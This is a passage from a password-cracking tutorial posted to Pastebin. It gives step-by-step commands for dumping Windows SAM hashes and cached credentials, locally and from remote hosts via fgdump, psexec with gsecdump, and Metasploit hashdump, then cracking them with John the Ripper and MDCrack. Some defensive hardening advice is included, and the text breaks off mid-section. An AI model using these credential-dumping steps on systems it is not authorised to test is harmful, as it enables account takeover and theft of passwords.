Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How to crack passwords !
- Cracking Passwords Version 1.1
- This document is for people who want to learn to the how and why of password cracking. There is
- a lot of information being presented and you should READ IT ALL BEFORE you attempted
- doing anything documented here. I do my best to provide step by step instructions along with the
- reasons for doing it this way. Other times I will point to a particular website where you find the
- information. In those cases someone else has done what I attempting and did a good or great job
- and I did not want to steal their hard work. These instructions have several excerpts from a
- combination of posts from pureh@te, granger53, irongeek, PrairieFire, RaginRob, stasik, and
- Solar Designer. I would also like to thank each of them and others for the help they have provided
- me on the BackTrack forum.
- I will cover both getting the SAM from inside windows and from the BackTrack CD, DVD, or
- USB flash drive. The SAM is the Security Accounts Manager database where local usernames and
- passwords are stored. For legal purposes I am using my own system for this article. The first step
- is to get a copy of pwdump. You can choose one from http://en.wikipedia.org/wiki/Pwdump.
- Update: I used to use pwdump7 to dump my passwords, however I have come across a new utility
- called fgdump from http://www.foofus.net/fizzgig/fgdump/ This new utility will dump passwords
- from clients and Active Directory (Windows 2000 and 2003 for sure, not sure about Windows
- 2008) where pwdump7 only dumps client passwords. I have included a sample hash.txt that has
- simple passwords and should be cracked very easily. NOTE: Some anti-virus software packages
- flag pwdump* and fgdump as trojan horse programs or some other unwanted program. If
- necessary, you can add an exclusion for fgdump and/or pwdump to your anti-virus package so it
- won't flag them. However it is better for the community if you contact your anti-virus vendor and
- ask them to not flag the tool as a virus/malware/trojan horse.
- You can find the latest version of this document at http://www.backtrack-linux.org/
- Contents
- 1 LM vs. NTLM
- 2 Syskey
- 3 Cracking Windows Passwords
- 3.1 Extracting the hashes from the Windows SAM
- 3.1.1 Using BackTrack Tools
- 3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
- 3.1.1.2 Using samdump2 v2.0.1 (BT4)
- 3.1.1.3 Cached Credentials
- 3.1.2 Using Windows Tools
- 3.1.2.1 Using fgdump
- 3.1.2.2 Using gsecdump
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 1 of 45 2/15/2010 3:48 PM
- 3.1.2.3 Using pwdump7
- 3.1.2.4 Cached Credentials
- 3.2 Extracting the hashes from the Windows SAM remotely
- 3.2.1 Using BackTrack Tools
- 3.2.1.1 ettercap
- 3.2.2 Using Windows Tools
- 3.2.2.1 Using fgdump
- 3.3 Cracking Windows Passwords
- 3.3.1 Using BackTrack Tools
- 3.3.1.1 John the Ripper BT3 and BT4
- 3.3.1.1.1 Cracking the LM hash
- 3.3.1.1.2 Cracking the NTLM hash
- 3.3.1.1.3 Cracking the NTLM using the cracked LM hash
- 3.3.1.1.4 Cracking cached credentials
- 3.3.1.2 John the Ripper - current
- 3.3.1.2.1 Get and Compile
- 3.3.1.2.2 Cracking the LM hash
- 3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
- 3.3.1.2.4 Cracking the NTLM hash
- 3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
- 3.3.1.2.6 Cracking cached credentials
- 3.3.1.3 Using MDCrack
- 3.3.1.3.1 Cracking the LM hash
- 3.3.1.3.2 Cracking the NTLM hash
- 3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.1.4 Using Ophcrack
- 3.3.1.4.1 Cracking the LM hash
- 3.3.1.4.2 Cracking the NTLM hash
- 3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2 Using Windows Tools
- 3.3.2.1 John the Ripper
- 3.3.2.1.1 Cracking the LM hash
- 3.3.2.1.2 Cracking the NTLM hash
- 3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2.1.4 Cracking cached credentials
- 3.3.2.2 Using MDCrack
- 3.3.2.2.1 Cracking the LM hash
- 3.3.2.2.2 Cracking the NTLM hash
- 3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2.3 Using Ophcrack
- 3.3.2.3.1 Cracking the LM hash
- 3.3.2.3.2 Cracking the NTLM hash
- 3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2.4 Using Cain and Abel
- 3.3.3 Using a Live CD
- 3.3.3.1 Ophcrack
- 4. Changing Windows Passwords
- 4.1 Changing Local User Passwords
- 4.1.1 Using BackTrack Tools
- 4.1.1.1 chntpw
- 4.1.2 Using a Live CD
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 2 of 45 2/15/2010 3:48 PM
- 4.1.2.1 chntpw
- 4.1.2.2 System Rescue CD
- 4.2 Changing Active Directory Passwords
- 5 plain-text.info
- 6 Cracking Novell NetWare Passwords
- 7 Cracking Linux/Unix Passwords
- 8 Cracking networking equipment passwords
- 8.1 Using BackTrack tools
- 8.1.1 Using Hydra
- 8.1.2 Using Xhydra
- 8.1.3 Using Medusa
- 8.1.4 Using John the Ripper to crack a Cisco hash
- 8.2 Using Windows tools
- 8.2.1 Using Brutus
- 9 Cracking Applications
- 9.1 Cracking Oracle 11g (sha1)
- 9.2 Cracking Oracle passwords over the wire
- 9.3 Cracking Office passwords
- 9.4 Cracking tar passwords
- 9.5 Cracking zip passwords
- 9.6 Cracking pdf passwords
- 10 Wordlists aka Dictionary attack
- 10.1 Using John the Ripper to generate a wordlist
- 10.2 Configuring John the Ripper to use a wordlist
- 10.3 Using crunch to generate a wordlist
- 10.4 Generate a wordlist from a textfile or website
- 10.5 Using premade wordlists
- 10.6 Other wordlist generators
- 10.7 Manipulating your wordlist
- 11 Rainbow Tables
- 11.1 What are they?
- 11.2 Generating your own
- 11.2.1 rcrack - obsolete but works
- 11.2.2 rcracki
- 11.2.3 rcracki - boinc client
- 11.2.4 Generating a rainbow table
- 11.3 WEP cracking
- 11.4 WPA-PSK
- 11.4.1 airolib
- 11.4.2 pyrit
- 12 Distributed Password cracking
- 12.1 john
- 12.2 medussa (not a typo this is not medusa)
- 13 using a GPU
- 13.1 cuda - nvidia
- 13.2 stream - ati
- 14 example hash.txt
- 1 LM vs. NTLM
- The LM hash is the old style hash used in MS operating systems before NT 3.1. It converts the password to
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 3 of 45 2/15/2010 3:48 PM
- uppercase, null-pads or truncates the password to 14 characters. The password is split into two 7 character
- halves and uses the DES algorithm. NT 3.1 to XP SP2 supports LM hashes for backward compatibility and is
- enabled by default. Vista supports LM hashes but is disabled by default. Given the weaknesses in the LM
- hash it is recommended to disable using LM hashes for all MS operating systems using the steps in
- http://support.microsoft.com/kb/299656
- NTLM was introduced in NT 3.1 and does not covert the password to uppercase, does not break the password
- apart, and supports password lengths greater than 14. There are two versions of NTLM v1 and v2. Do to a
- weakness in NTLM v1 is should not be used. Microsoft has included support for NTLM v2 for all of its
- operating systems either via service pack or the Directory Services client (for windows 9X). You enable
- NTLM v2 by following the instructions at http://support.microsoft.com/kb/239869. For maximum security
- you should set the LMCompatibility to 3 for Windows 9X and LMCompatibilityLevel to 5 for NT, 2000, XP,
- and 2003. Of course you should test these changes BEFORE you put them into a production environment.
- If LM hashes are disabled on your system the output of pwdump and/or the 127.0.0.1.pwdump text file will
- look like:
- Administrator:500:NO PASSWORD*********************:00AB1D1285F410C30A83B435F2CA798D:::
- Guest:501:NO PASSWORD*********************:31A6CAE0D36AD931B76C59D7E1C039C0:::
- HelpAssistant:1000:NO PASSWORD*********************:BF23C2595478A6279F7CB53EF76E601F:::
- SUPPORT_3845a0:1002:NO
- PASSWORD*********************:0C8D62E10A6240BACD910C8AB295BB79:::
- ASPNET:1005:9F07AE96CA4310752BDC083AAC960496:A99C1C3DB39E3C732EF5C2F63579AF96:::
- The first field is the username. The second field is the last four numbers of the SID for that username. The
- SID is a security identifier that is unique to each username. The third field is the LM hash. The forth field is
- the NTLM hash.
- If you do not have a ASPNET user account do not worry about it. If you do have a ASPNET user account do
- NOT change the password as I am told that will break something. What I did was delete the account and then
- recreate it using: systemroot%\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe /i
- 2 Syskey
- To make it more difficult to crack your passwords, use syskey. For more information on syskey see
- http://support.microsoft.com/kb/310105. The short version is syskey encrypts the SAM. The weakest option
- but most convenient is to store a system generated password locally; locally means the registry. The up side is
- the SAM gets encrypted and you can reboot the server remotely without extra equipment. The next option is
- password startup. This is slightly more difficult to get around, but if you remotely reboot the server, it will
- stop and wait for someone to enter the password. You will need a KVM over IP or a serial port concentrator
- so you can enter the password remotely. The most secure option is the system generated password stored on a
- floppy disk. The downside to this option is floppy disks fail, you misplace the floppy disk, newer equipment
- does not have a floppy disk drive, no remote reboots, and you will probably leave the floppy in the drive so
- you can remote reboot and that defeats security. I use a system generated password stored locally, weak but
- better than not doing it. To disable syskey use chntpw and follow its instructions.
- 3 Cracking Windows Passwords
- 3.1 Extracting the hashes from the Windows SAM
- 3.1.1 Using BackTrack Tools
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 4 of 45 2/15/2010 3:48 PM
- 3.1.1.1 Using bkhive and samdump2 v1.1.1 (BT2 and BT3)
- # mount /dev/hda1 /mnt/XXX
- mount your windows partition substituting hda1 for whatever your windows partition is
- 1.
- if the syskey password is stored locally you need to extract it from the registry so you can decrypt the
- SAM. If syskey is setup to prompt for a password or the password is on a floppy, stop now and read the
- syskey documentation in this document for more information about syskey. If you installed windows to
- something other C:\WINDOWS please substitute the correct path. WARNING the path is case
- sensitive. The filenames of sam, security, and system are case sensitive. On my system these files are
- lowercase. I have come across other XP systems where they are uppercase. On the Vista system I have
- used the filenames are uppercase.
- BackTrack 2 users use the following:
- # bkhive-linux /mnt/XXX/WINDOWS/system32/config/system syskey.txt
- BackTrack 3 users use the following:
- # bkhive /mnt/XXX/WINDOWS/system32/config/system syskey.txt
- 2.
- # samdump2 /mnt/XXX/WINDOWS/system32/config/sam syskey.txt >hash.txt
- samdump2 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt
- you can also run samdump2 with the -o parameter to write the output to a file
- # samdump2 -o hash.txt /mnt/XXX/WINDOWS/system32/config/sam syskey.txt
- 3.
- 3.1.1.2 Using new samdump2 v2.0 (BT4)
- The current version is 2.0.1 and has the benefit of being able to extract the syskey on its own. This means
- dumping the hashes in now a 1 step process instead of two. To upgrade and run sampdump2 v2.0.1:
- 1. download the current sampdump2 from http://sourceforge.net/project/showfiles.php?group_id=133599
- 2. # tar -xjvf samdump2-2.0.1.tar.bz2
- 3. # cd samdump2-2.0.1
- 4. # make
- # cp samdump2 /usr/local/bin/samdump20
- this will keep the existing version. If you want to overwrite the existing version do:
- # cp samdump2 /usr/local/bin/
- 5.
- mount your windows partition substituting hda1 for whatever your windows partition is
- # mount /dev/hda1 /mnt/XXX
- 6.
- if the syskey password is stored locally samdump2 v2.0 will extract it from the registry so it can decrypt
- the SAM. If syskey is setup to prompt for a password or the password is on a floppy, stop now and read
- the syskey documentation in this document for more information about syskey. If you installed
- windows to something other C:\WINDOWS please substitute the correct path. WARNING the path is
- case sensitive. The filenames of sam, security, and system are case sensitive. On my system these files
- are lowercase. I have come across other XP systems where they are uppercase. On the Vista system I
- have used the filenames are uppercase.
- 7.
- # samdump2 /mnt/XXX/WINDOWS/system32/config/system /mnt/XXX/WINDOWS/system32
- /config/sam >hash.txt
- samdump2 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt
- you can also run samdump2 with the -o parameter to write the output to a file
- # samdump2 -o hash.txt /mnt/XXX/WINDOWS/system32/config/sam syskey.txt
- 8.
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 5 of 45 2/15/2010 3:48 PM
- 3.1.1.3 Cached Credentials
- The only Linux based application to dump cached credentials I found is creddump which can be found at
- http://code.google.com/p/creddump/. samdump v2.0.1 couldn't do this so I wrote the code to dump cached
- credentials. I have submitted it upstream so I hope to see this feature in the next version.
- 3.1.2 Using Windows Tools
- 3.1.2.1 Using fgdump
- To dump local passwords:
- Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this my
- system I know administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 1.
- Download one of the fgdump files from http://swamp.foofus.net/fizzgig/fgdump/downloads.htm and
- unzip it.
- 2.
- run the fgdump utility you downloaded
- C:\> fgdump -v
- 3.
- copy the 127.0.0.1.pwdump file to a floppy or USB thumb drive if you are going to use BackTrack to
- crack the hashes
- 4.
- You can dump passwords from remote systems but only if you know the remote local administrator password
- or have domain administrator privledges.
- Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this my
- system I know administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 1.
- Download one of the fgdump files from http://swamp.foofus.net/fizzgig/fgdump/downloads.htm and
- unzip it.
- 2.
- run the fgdump utility you downloaded
- C:\> fgdump -v -h hostname -u Username -p Password
- where hostname is the name or ip of the remote system you want to retreive the passwords from
- Username is the username of the account to connect to the remote system with; usually Administrator
- or Domain\Administrator or an account with Domain Administrator privledges.
- Password is the password of the above account
- NOTE: If you have a firewall installed on the remote system this will not work.
- 3.
- copy the 127.0.0.1.pwdump file to a floppy or USB thumb drive if you are going to use BackTrack to
- crack the hashes
- 4.
- 3.1.2.2 Using gsecdump
- Thanks to williamc for pointing out another password dumping tool. These instructions are based on the
- Exploitation part of his Intranet Exploitation tutorial.
- Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this my
- system I know administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 1.
- Download the gsecdump file from http://www.truesec.com/PublicStore/catalog
- /categoryinfo.aspx?cid=223. You have to click on the Hamta filen link to download it. Once
- downloaded, unzip it.
- 2.
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 6 of 45 2/15/2010 3:48 PM
- Download the psexec tool from http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx and
- unzip it
- 3.
- run as follows:
- C:\> psexec \\hostname -u username -p password -s -f -c gsecdump.exe -s > hash.txt
- hostname is the name of the PC where you want psexec to run. AKA the target.
- username is the username to login to the remote PC.
- password is the password of the above username. If you don't put in it here you be prompted to enter it.
- If you are prompted the password won't be displayed.
- -s tells the process to runas the system account
- -f copies the program to the target pc even if it exists
- -c copies the program to the target pc
- gsecdump.exe is the utility you want to run
- -s tells gsecdump to dump the SAM/AD hashes
- the > character redirects the output to a file called hash.txt
- NOTE: If you have a firewall installed on the remote system this will not work.
- 4.
- copy the hash.txt file to a floppy or USB thumb drive if you are going to use BackTrack to crack the
- hashes
- 5.
- 3.1.2.3 Using pwdump
- 1. Download one of the pwdump files from http://en.wikipedia.org/wiki/Pwdump and unzip it.
- Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this my
- system I know administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 2.
- run the pwdump utility you downloaded
- C:\> pwdump7 >c:\hash.txt
- pwdump7 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt
- 3.
- copy the hash.txt file to a floppy or USB thumb drive if you are going to use BackTrack to crack the
- hashes
- 4.
- 3.1.2.4 Cached Credentials
- When a user logs into a domain their password is cached in the registry so that in the event that the Domain
- Controller or network goes down the user can still login to their PC. To export these registry keys you need a
- tool call cachedump. It can be downloaded from ftp://ftp.openwall.com/john/contrib/cachedump/
- The readme.txt in the zip contains everything you want to know about where the cached credentials are
- stored, how cached credentials work, how they are hashed, and how the tool works. Cachedump does not
- work on Windows Vista. Vista changed the way that cached creditionals work.
- You can also download the fgdump with source file from http://www.foofus.net/fizzgig/fgdump/ and get
- cachedump and its source code.
- To use:
- 1. Extract the cachedump.exe from the zip
- 2. Login to the PC as an administrator
- 3. Goto a cmd prompt (Start, Run, cmd)
- 4. C:\> cd \path to cachedump.exe
- 5. C:\> cachedump.exe -v
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 7 of 45 2/15/2010 3:48 PM
- This runs cachedump.exe in verbose mode. I suggest running cachedump in verbose the first time you
- use it so you know what is going on and can identify any problems. Once you have good information
- displayed on the screen you can use:
- C:\> cachedump.exe >cache.txt
- and this will redirect the output from the screen to a file called cache.txt
- Now you can use John The Ripper or Cain and Abel to crack the hashes. Please note that Cached Credentials
- use a different hash than LM or NTLM. The lowercase username is salted with the password.
- The best way to protect yourself from this is to disable cached credentials. Change the value of the following
- registry key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS
- NT\CURRENTVERSION\WINLOGON\CACHEDLOGONSCOUNT to 0. You can do this manually or with
- Group Policy.
- 3.2 Extracting Windows Password hashes remotely
- 3.2.1 Using BackTrack Tools
- 3.2.1.1 Using ettercap
- You can use ettercap and the man in the middle attacks to sniff the username and password of a user over the
- network. DO NOT ATTEMPT THIS WITHOUT PERMISSION OF THE USER WHOSE ACCOUNT YOU
- WANT TO SNIFF.
- You can read an ettercap tutorial at http://openmaniak.com/ettercap.php which covers the basics on how to
- use ettercap. There so much that ettercap can do and there are many tutorials covering how to use it I am not
- going to duplicate the effort. Just do a quick search using your favorite internet search engine for ettercap
- tutorials and read.
- 3.2.1.2 Using hashdump (metasploit)
- I am not going to cover this in great detail. To use hashdump you first have to use metasploit to compromise
- the PC from which you want the password hashes. There are already a number of tutorials that explain how
- to use metaspolit. The best documentation is at http://www.metasploit.com/framework/support/. Once you
- have compromised the PC using metasploit you can extract the hashes doing:
- use priv
- hashdump
- 3.2.2 Using Windows Tools
- 3.2.2.1 Using fgdump
- Download one of the fgdump files from http://swamp.foofus.net/fizzgig/fgdump/downloads.htm and
- unzip it.
- 1.
- Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this my
- system I know administrator password. You will need the administrator password or the username and
- password of a an account that is in the local Administrators group on the PC from which you want the
- hashes.
- 2.
- 3. run the fgdump utility you downloaded
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 8 of 45 2/15/2010 3:48 PM
- C:\> fgdump -v -h hostname or IP_Address_of_Target -u username -p password
- where username and password are an account with administrator privileges.
- copy the 127.0.0.1.pwdump file to a floppy or USB thumb drive if you are going to use BackTrack to crack
- the hashes
- 3.2.2.2 Using pwdump6
- 1. Download pwdump6 from http://en.wikipedia.org/wiki/Pwdump and unzip it.
- Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this my
- system I know administrator password. You will need the administrator password or the username and
- password of a an account that is in the local Administrators group on the PC from which you want the
- hashes.
- 2.
- run the utility you downloaded
- C:\> pwdump6 -u username -p password hostname or IP_Address_of_Target>c:\hash.txt
- where username and password are an account with administrator privileges.
- pwdump6 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt
- 3.
- copy the hash.txt file to a floppy or USB thumb drive if you are going to use BackTrack to crack the
- hashes
- 4.
- 3.3 Cracking Windows Passwords
- 3.3.1 Using BackTrack Tools
- My strategy for cracking windows passwords is like this:
- 1. Get/Develop a really good wordlist/dictionary
- 2. Find the password policy that is enforced for the account you are trying crack
- 3. Crack the LM hash using John the Ripper
- Crack the NTLM hash with the results of the cracked LM hash and the password policy information
- using mdcrack
- 4.
- If there is no LM hash to crack I proceed to cracking with John the Ripper using the password policy
- information and my wordlist. Then I use rainbowtables if the tables match the password policy. http://plaintext.info
- is back up and running so I check if they have the cracked password already. To successfully use a
- rainbow table you need to know the password policy. No sense downloading a rainbow table that contains
- letters and numbers when the password policy requires a symbol (!@#$%^&* etc).
- 3.3.1.1 John the Ripper BT3 and BT4
- Version 1.7.2 shipped with BackTrack 3. Version 1.7.3.1 with jumbo patch 5 shipped with BT4. The john the
- ripper that ships with BT4 requires at least a P4 with SSE2 instructions. If you don't have a processor that
- supports SSE2 then you have download and compile john yourself. See the next section for instructions on
- how to do this.
- 3.3.1.1.1 Cracking the LM hash
- john only needs to know the path to the hash.txt to begin bruteforcing and return the uppercase password
- # /usr/local/john/john hash.txt
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 9 of 45 2/15/2010 3:48 PM
- 3.3.1.1.2 Cracking the NTLM hash
- john only needs to know the path to the hash.txt to begin bruteforcing and return the password
- # /usr/local/john/john --format:NT hash.txt
- will begin to bruteforce the NTLM hashes
- 3.3.1.1.3 Cracking the NTLM hash using the cracked LM hash
- Stasik told me it is much easier to crack the NTLM hash if you know the character set. This way you do not
- need to bruteforce all possible characters combinations. Once you have TESTTEST, feed a custom character
- set of tesTES to john and it will return the proper case password much faster than if you did not limit the
- character set. The issue is john has no easy way to limit the character set. You will have to modify the
- john.conf file and include the following code that Solar Designer has kindly published to the john-users mail
- list:
- [List.External:customcharset]
- int running; // Are we already running?
- int last; // Last character position, zero-based
- int c0, c[0x100]; // Cyclic charset
- void init()
- {
- int length, cm, i;
- length = 10; // password length
- c[c0 = 't'] = 'e'; // change the t and the e to the first and second letters of the custom character set
- c['e'] = 's'; // change the e and the s to the second and third letters of the character set
- c['s'] = 'T'; // change the s and T to the third and fourth letters
- c['T'] = 'E'; // etc
- c['E'] = 'S'; // etc
- c[cm = 'S'] = c0; // change the S to the last letter of the character set
- // If you cannot see the pattern then do not bother with this trick.
- // If you can make the necessary changes to suit you environment.
- running = 0;
- last = length - 1;
- i = 0;
- while (i < length) word[i++] = cm; word[i] = 0;
- }
- void generate()
- {
- int i;
- i = last;
- while ((word[i] = c[word[i]]) == c0)
- if (!i--) {
- if (running++) word = 0;
- return;
- }
- }
- Once you make the necessary changes begin cracking using:
- # /usr/local/john/john -external=customcharset --format:NT hash.txt
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 10 of 45 2/15/2010 3:48 PM
- Some notes from Solar Designer:
- Being an external mode, this is not the fastest way to generate candidate passwords, although its
- performance is acceptable. Some further optimizations are possible (e.g., cache the last character
- outside of the word[] array). Also, be careful when you edit it (such as for a different charset) - errors
- in the way the cyclic charset is defined may result in the "while" loop in generate() becoming endless.
- 1.
- In order to actually crack an NTLM hash with this, you need a build of JtR with support for NTLM
- hashes. You may do a custom build with the latest jumbo patch (john-1.7.2-all-9.diff.gz), which means
- that you will need to install Cygwin on your Windows system, or you can download such a build made
- by someone else (one is linked from the JtR homepage - it is for an older version of the patch, though,
- so it is many times slower at NTLM hashes).
- 2.
- On a modern system, with a recent jumbo patch, and with the proper "make" target for your system,
- this should complete its work against an NTLM hash (or against many such hashes) in just a few
- minutes.
- 3.
- 3.3.1.1.4 Cracking cached credentials
- john only needs to know the path to the hash.txt to begin bruteforcing and return the password
- # /usr/local/john/john --format:mscash hash.txt
- 3.3.1.2 John the Ripper - current
- The current version of John the Ripper doesn't ship with BT4. It adds some new features (dumbforce and
- knownforce) and speeds up several algorithms. However given the way BT4 handles updates I don't
- recommend updating the package yourself unless your processor doesn't support SSE2 instructions (i.e.
- something less than a P4). I recommend going to http://www.backtrack-linux.org/forums/tool-requests/ and
- requesting they update the package to the latest version. Do NOT ask them to drop the SSE2 requirement.
- The SSE2 instructions provide real benefits to the cracking process. If you need to compile your own version
- here is how.
- 3.3.1.2.1 Get and Compile
- We first have to remove the existing package and then we can download and compile the program.
- 1. open a terminal window
- 2. # dpkg -r john
- 3. # wget http://www.openwall.com/john/g/john-1.7.4.2.tar.bz2
- goto ftp://ftp.openwall.com/john/contrib/
- and look for something like john-1.7.4.2-jumbo-1.diff.gz
- This is version 1 of the jumbo patch for john 1.7.4.2. Download the latest version that is there.
- 4.
- 5. # tar -xvf john-1.7.4.2.tar.bz2
- 6. # cd john-1.7.4.2
- # zcat ../john-1.7.4.2-jumbo-1.diff.gz | patch -p1 -Z
- You should see a long list of patching file XXX. If you see X out of Y hunk ignored it means that the
- patch did not apply correctly. You either downloaded the wrong version of john or the jumbo patch.
- Start over and make sure the jumbo patch matches the version of john you download.
- 7.
- 8. # cd src
- # make
- This will display the various systems you can compile john for. I have a P3 that supports MMX so I will
- use the command: make linux-x86-mmx. To see which options your CPU supports do a: cat
- 9.
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 11 of 45 2/15/2010 3:48 PM
- /proc/cpuinfo and look at the flags. If you have a P4 you probably have SEE2 (check the cpuinfo flags)
- then you would use: make linux-x86-see2.
- # make linux-x86-mmx
- You should see the following when john is done compiling:
- gcc DES_fmt.o DES_std.o DES_bs.o BSDI_fmt.o MD5_fmt.o MD5_std.o MD5_apache_fmt.o
- BFEgg_fmt.o BF_fmt.o BF_std.o AFS_fmt.o LM_fmt.o NT_fmt.o XSHA_fmt.o DOMINOSEC_fmt.o
- lotus5_fmt.o oracle_fmt.o MYSQL_fmt.o mysqlSHA1_fmt.o KRB5_fmt.o KRB5_std.o md5_go.o
- rawMD5go_fmt.o md5_eq.o PO_fmt.o md5.o hmacmd5.o hmacMD5_fmt.o IPB2_fmt.o
- rawSHA1_fmt.o NSLDAP_fmt.o NSLDAPS_fmt.o OPENLDAPS_fmt.o base64.o md4.o smbencrypt.o
- mscash_fmt.o NETLM_fmt.o NETNTLM_fmt.o NETLMv2_fmt.o NETHALFLM_fmt.o mssql_fmt.o
- mssql05_fmt.o EPI_fmt.o PHPS_fmt.o MYSQL_fast_fmt.o pixMD5_fmt.o sapG_fmt.o sapB_fmt.o
- NS_fmt.o HDAA_fmt.o batch.o bench.o charset.o common.o compiler.o config.o cracker.o crc32.o
- external.o formats.o getopt.o idle.o inc.o john.o list.o loader.o logger.o math.o memory.o misc.o
- options.o params.o path.o recovery.o rpp.o rules.o signals.o single.o status.o tty.o wordlist.o mkv.o
- mkvlib.o unshadow.o unafs.o undrop.o unique.o x86.o x86-mmx.o sha1-mmx.o md5-mmx.o -s -L/usr
- /local/lib -L/usr/local/ssl/lib -lcrypto -lm -o ../run/john
- rm -f ../run/unshadow
- ln -s john ../run/unshadow
- rm -f ../run/unafs
- ln -s john ../run/unafs
- rm -f ../run/unique
- ln -s john ../run/unique
- rm -f ../run/undrop
- ln -s john ../run/undrop
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops genmkvpwd.c
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops
- -D_JOHN_MISC_NO_LOG misc.c -o miscnl.o
- gcc genmkvpwd.o mkvlib.o memory.o miscnl.o -s -lm -o ../run/genmkvpwd
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops
- mkvcalcproba.c
- gcc mkvcalcproba.o -s -lm -o ../run/mkvcalcproba
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops calc_stat.c
- gcc calc_stat.o -s -lm -o ../run/calc_stat
- make[1]: Leaving directory `/root/john-1.7.4.2/src'
- 10.
- 11. # cd ..
- 12. # mv run /pentest/passwords/john
- You now have the latest version of John the Ripper and it supports more algorithms than the vanilla John the
- Ripper thanks to the jumbo patch.
- 3.3.1.2.2 Cracking the LM hash
- john only needs to know the path to the hash.txt to begin bruteforcing and return the uppercase password
- # /usr/local/john/john hash.txt
- 3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
- I haven't figured out how to use this feature. John the Ripper is a very powerful tool however it is not very
- intuitive to use. I can point you to the John the Ripper wiki which has maillist excerpts cover how to use
- dumbforce and knownforce. The url is http://openwall.info/wiki/john/mailing-list-excerpts
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 12 of 45 2/15/2010 3:48 PM
- 3.3.1.2.4 Cracking the NTLM hash
- john only needs to know the path to the hash.txt to begin cracking and return the password
- # /usr/local/john/john --format:NT hash.txt
- will begin to bruteforce the NTLM hashes
- 3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
- I haven't figured out how to use this feature. John the Ripper is a very powerful tool however it is not very
- intuitive to use. I can point you to the John the Ripper wiki which has maillist excerpts cover how to use
- dumbforce and knownforce. The url is http://openwall.info/wiki/john/mailing-list-excerpts
- 3.3.1.2.6 Cracking cached credentials
- john only needs to know the path to the hash.txt to begin bruteforcing and return the password
- # /usr/local/john/john --format:mscash hash.txt
- 3.3.1.3 Using MDCrack
- For whatever reason I have been unsuccessful in getting mdcrack-183 to work with any version of wine. This
- is strange as I know I had it working previously. To use mdcrack with BackTrack you should upgrade wine to
- the latest development version of wine and then use mdcrack-182.zip
- For BackTrack 3 users:
- 1. Goto http://www.winehq.org/site/download and click on slackware.
- 2. download the latest tgz file, which as of this writting is 1.1.29
- 3. open a xterm window
- 4. # upgradepkg wine-1.1.29-i486-1kjz.tgz
- Now you can download mdcrack-182.zip download mdcrack
- # wget http://membres.lycos.fr/mdcrack/download/MDCrack-182.zip
- or
- # wget http://c3rb3r.openwall.net/mdcrack/download/MDCrack-182.zip
- 5.
- 6. # mkdir mdcrack
- 7. # mv MDCrack-182.zip mdcrack
- 8. # cd mdcrack
- 9. # unzip MDCrack-182.zip
- For BackTrack 4 users:
- 1. open a xterm window
- 2. # wget -q http://wine.budgetdedicated.com/apt/387EE263.gpg -O- | sudo apt-key add -
- # sudo wget http://wine.budgetdedicated.com/apt/sources.list.d/jaunty.list -O /etc/apt/sources.list.d
- /winehq.list
- 3.
- 4. # sudo apt-get update
- 5. # sudo apt-get install wine
- Now you can download mdcrack-182.zip download mdcrack
- # wget http://membres.lycos.fr/mdcrack/download/MDCrack-182.zip
- or
- # wget http://c3rb3r.openwall.net/mdcrack/download/MDCrack-182.zip
- 6.
- 7. # mkdir mdcrack
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 13 of 45 2/15/2010 3:48 PM
- 8. # mv MDCrack-182.zip mdcrack
- 9. # cd mdcrack
- 10. # unzip MDCrack-182.zip
- 3.3.1.3.1 Cracking the LM hash
- MDCrack doesn't crack LM hashes.
- 3.3.1.3.2 Cracking the NTLM hash
- # wine MDCrack-sse.exe --algorithm=NTLM1 NTLMHASH
- NTLMHASH would be D280553F0103F2E643406517296E7582 for example
- The result should be TestTest
- The only way to speed up cracking is to know the minimum length of the password and use --minsize= to
- specify it.
- 3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
- Stasik told me it is much easier to crack the NTLM hash if you know the character set. This way you do not
